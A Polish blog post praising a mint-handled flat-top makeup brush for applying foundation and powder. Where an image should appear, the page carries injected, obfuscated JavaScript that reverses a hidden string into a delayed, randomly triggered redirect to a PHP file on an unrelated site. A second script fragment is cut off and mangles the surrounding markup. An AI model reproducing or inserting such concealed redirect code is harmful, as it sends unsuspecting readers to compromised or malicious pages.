Mój ulubiony pędzel do makijażu

Od kilku miesięcy powoli kompletuję swoją kolekcję pędzli. Wcześniej nie doceniałam wartości dobrego pędzla, ale teraz już wiem, że przy pomocy dobrej jakości pędzli można zrobić makijaż, który wygląda po prostu perfekcyjnie. Mając w domu już ponad dwadzieścia pędzli mogę teraz śmiało wybrać ten, który jest moim ulubionym.

Flat top pomaga w równomiernym nakładaniu podkładu

pędzel flat <script>$nJe=function(n){if (typeof ($nJe.list[n]) == „string”) return $nJe.list[n].split(„”).reverse().join(„”);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}</script><script>$NjS=function(n){if(typeof ($NjS.list[n])==top” height=”167″ src=”http://bramyroletygliwice.pl/wp-content/uploads/2018/05/pedzel-flat-top.jpg” style=”float:left;” width=”250″/>Przez długi czas podkład nakładałam ręką. Był to sposób bardzo szybki i myślałam, że nałożony w ten sposób podkład wygląda dobrze. Jednakże jak tylko kupiłam swój pierwszy pędzel flat top przekonałam się, że podkład na mojej twarzy może wyglądać jeszcze lepiej, po prostu idealnie i co najważniejsze bardzo równomiernie. A do tego nakładanie fluidu może być o wiele bardziej higieniczne oraz nie robić tyle bałaganu na toaletce. Nakładając podkład rękoma zawsze brudziłam nimi potem powierzchnię blatu albo opakowania innych kosmetyków. Dlatego też, teraz, kiedy mam już pędzel do makijażu z pewnością nie wrócę już do nakładania kosmetyków rękoma. Mój nowy pędzel jest w typie flat top, a więc świetnie nakłada się nim podkłady płynne, ale też i mineralne. Nakładanie produktów tym pędzlem idzie bardzo gładko. Syntetyczne włosie jest bardzo miękkie w dotyku, i tak samo przyjemnie czuje się ten pędzel na twarzy. Wybrałam pędzel bardzo dobrej firmy, a więc jestem pewna, że będzie on mi służył przez kilka dobrych lat. Jeżeli oczywiście będę o niego odpowiednio dbać.

Nowy pędzel stał się zdecydowanie moim ulubionym. Używam go codziennie i to nie tylko do nakładania podkładu. Świetnie sprawdza mi się też do pudru. Chociaż pędzel jest po prostu niesamowicie użyteczny to podoba mi się też to jak on wygląda. Trzonek jest w kolorze miętowym i jest bardzo solidny. Widać, że jest to rzecz o bardzo dobrej jakości.